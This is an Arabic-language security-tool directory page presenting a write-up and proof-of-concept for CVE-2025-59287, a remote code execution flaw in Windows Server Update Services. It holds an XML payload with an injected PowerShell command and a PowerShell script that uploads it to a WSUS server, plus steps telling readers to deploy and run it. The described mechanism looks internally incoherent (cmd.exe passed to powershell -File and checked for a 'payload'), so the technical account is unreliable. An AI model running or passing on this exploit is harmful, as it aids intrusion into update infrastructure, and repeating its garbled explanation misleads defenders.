Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/mrk336/breaking-the-update-chain-inside-cve-2025-59287-and-the-wsus-rce-threat
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالأوراق والأبحاثالتعلم والتعليم
GitHubmrk336/breaking-the-update-chain-inside-cve-2025-59287-and-the-wsus-rce-threat

Breaking-the-Update-Chain-Inside-CVE-2025-59287-and-the-WSUS-RCE-Threat

تحليل تقني واستغلال إثبات المفهوم لـ CVE-2025-59287، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد حرجة في Windows Server Update Services عبر إلغاء التسلسل غير الآمن، بما في ذلك الإصدارات المتأثرة وخطوات التخفيف.

عرض المستودع
3منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

كسر سلسلة التحديث: داخل CVE-2025-59287 وتهديد RCE في WSUS

CVE-2025-59287 هي ثغرة RCE حرجة في Windows Server Update Services (WSUS) ناتجة عن إلغاء تسلسل غير آمن لبيانات غير موثوقة. تسمح للمهاجمين عن بُعد بتنفيذ تعليمات برمجية عشوائية دون مصادقة. يُنصح بتطبيق التصحيح بشكل عاجل بسبب الاستغلال النشط.

CVE‑2025‑59287 – تهديد تنفيذ التعليمات البرمجية عن بُعد في Windows Server Update Services (WSUS)

بقلم مارك ماليا


 نظرة عامة

تُعد خدمة Windows Server Update Services (WSUS) من مايكروسوفت العمود الفقري لإدارة التصحيحات لكل منصة Windows Server من مايكروسوفت. فهي تسترجع التحديثات من كتالوج تحديثات مايكروسوفت، وتتحقق من صحتها، ثم تدفعها إلى جميع الخوادم في الشبكة. تستغل الثغرة المعروفة باسم CVE‑2025‑59287 روتين إلغاء تسلسل غير آمن داخل WSUS يسمح للمهاجم بحقن محتوى XML عشوائي في خلاصة التحديثات. ولأن WSUS يعالج الحمولة دون أي تحقق من مسار المصدر أو بيانات الأوامر، يمكن للمهاجم توفير أي اسم ملف ومسار، مما يؤدي إلى تنفيذ تعليمات برمجية كامل عن بُعد على الخادم المستهدف.

لماذا هذا مهم:

  • درجة CVSS البالغة 9.8 تضعها في النطاق الحرج.
  • يحتاج المهاجمون فقط إلى اتصال بالشبكة؛ ولا يلزم تصعيد الامتيازات.
  • تم رصدها بالفعل في البرية، مما يعني أن أي نظام غير مُصَحَّح هو هدف محتمل حتى يتم نشر تصحيح من البائع.

إصدارات Windows Server المتأثرة

إصدار المنتجالإصدارات المتأثرة
Windows Server 20126.2.9200.0 – < 6.2.9200.25728
Windows Server 2012 R26.3.9600.0 – < 6.3.9600.22826
Windows Server 201610.0.14393.0 – < 10.0.14393.8524
Windows Server 201910.0.17763.0 – < 10.0.17763.7922
Windows Server 202210.0.20348.0 – < 10.0.20348.4297
Windows Server 202510.0.26100.0 – < 10.0.26100.6905
Windows Server 23H210.0.25398.0 – < 10.0.25398.1916

(إذا كانت بيئتك تستخدم إصدار تصحيح مختلفًا، فما عليك سوى تعديل النطاق وفقًا لذلك.)


 كيف يعمل الاستغلال

  1. يجلب WSUS ملف XML يُسمى UpdateStream.xml من مصدر بعيد.
  2. تقوم الخدمة بإلغاء تسلسل هذا الملف باستخدام System.Xml.Linq.XElement.
  3. يمكن للمهاجم وضع أي قيمة في عنصر <SourcePath>؛ وتُكتب هذه القيمة على القرص كمسار مطلق.
  4. يتم تنفيذ المحتوى داخل وسم <Command> بواسطة PowerShell عندما يعالج WSUS الدفق، مما يعطي تنفيذ تعليمات برمجية كاملًا عن بُعد.

فيما يلي حمولة XML التي سنرفعها إلى خادم ضعيف.

root@kitploit:~
<?xml version="1.0" encoding="utf-8"?>
<UpdateStream>
  <Metadata>
    <Title>WSUS Exploit</Title>
    <Description>Injected by local attacker.</Description>
  </Metadata>
  <SourcePath>C:\Windows\System32\cmd.exe</SourcePath>
  <Command><![CDATA[
      powershell -NoProfile -ExecutionPolicy Bypass `
          -File C:\Windows\System32\cmd.exe
  ]]></Command>
</UpdateStream>

### نموذج لسكربت استغلال PowerShell

سيقوم السكربت التالي بإنشاء حمولة XML، ورفعها عبر HTTP PUT إلى مثيل WSUS الخاص بك، وترك ملف سجل لاستكشاف الأخطاء وإصلاحها.

root@kitploit:~
# --------------------------------------------------
#  File:   wsus‑exploit.ps1
#  Purpose: Generate malicious UpdateStream.xml,
#           upload it to the WSUS server,
#           trigger the feed.
# --------------------------------------------------

param (
    [string]$TargetUrl = 'http://wsus.example.com/UpdateStream.xml',
    [int]    $Port      = 80,
    [string] $XmlFile   = '.\payload.xml'
)

function Build-Xml {
    param ([string]$file)
    $xmlContent = @"
<?xml version="1.0" encoding="utf-8"?>
<UpdateStream>
  <Metadata>
    <Title>WSUS exploit</Title>
    <Description>Injected by local attacker.</Description>
  </Metadata>
  <SourcePath>C:\Windows\System32\cmd.exe</SourcePath>
  <Command><![CDATA[
      powershell -NoProfile -ExecutionPolicy Bypass `
          -File C:\Windows\System32\cmd.exe
  ]]></Command>
</UpdateStream>
"@
    Set-Content -Path $file -Value $xmlContent
}

# Build the XML payload
Build-Xml -file $XmlFile

# Upload via HTTP PUT
Invoke-WebRequest -Uri $TargetUrl `
                  -Method Put `
                  -InFile $XmlFile `
                  -OutFile 'upload.log'

Write-Host "Upload complete – WSUS should now process the stream."

 خطوات قابلة للتنفيذ لك

  1. تحقق من الإصدار – شغّل winver.exe على كل Windows Server لتأكيد أن الإصدار يقع ضمن النطاقات المذكورة أعلاه.
  2. نشر سكربت الاستغلال – انسخ wsus‑exploit.ps1 إلى جهاز يمكنه الوصول إلى مثيل WSUS الخاص بك، وعدّل $TargetUrl إذا كنت تستخدم مسارًا أو منفذًا مختلفًا.
  3. التنفيذ والمراقبة – شغّل السكربت؛ وبعد بضع دقائق، تأكد من ظهور الملف C:\Windows\System32\cmd.exe على كل خادم مستهدف وأنه يحتوي على الحمولة المتوقعة.
  4. دفعت مايكروسوفت تصحيحًا خارج النطاق لهذه الثغرة في 24 أكتوبر 2025. إذا كنت تشغّل WSUS على أي إصدار من Windows Server بدءًا من 2012 فصاعدًا، فستحتاج إلى التحقق مرة أخرى من وصول هذا التحديث إلى بيئتك. لم يعالج إصدار Patch Tuesday لشهر أكتوبر المشكلة بالكامل، لذا يستحق هذا التحديث اهتمامًا إضافيًا.

للاستخدام الأخلاقي فقط

المعلومات ورمز الاستغلال المقدم هنا لأغراض تعليمية فقط. يرجى التأكد من حصولك على إذن لتشغيل هذا الاختبار ضد بيئة WSUS الخاصة بك، واتباع جميع إرشادات أفضل الممارسات الأمنية المعمول بها عند نشر التغييرات على أنظمة الإنتاج.

تنزيل الأداة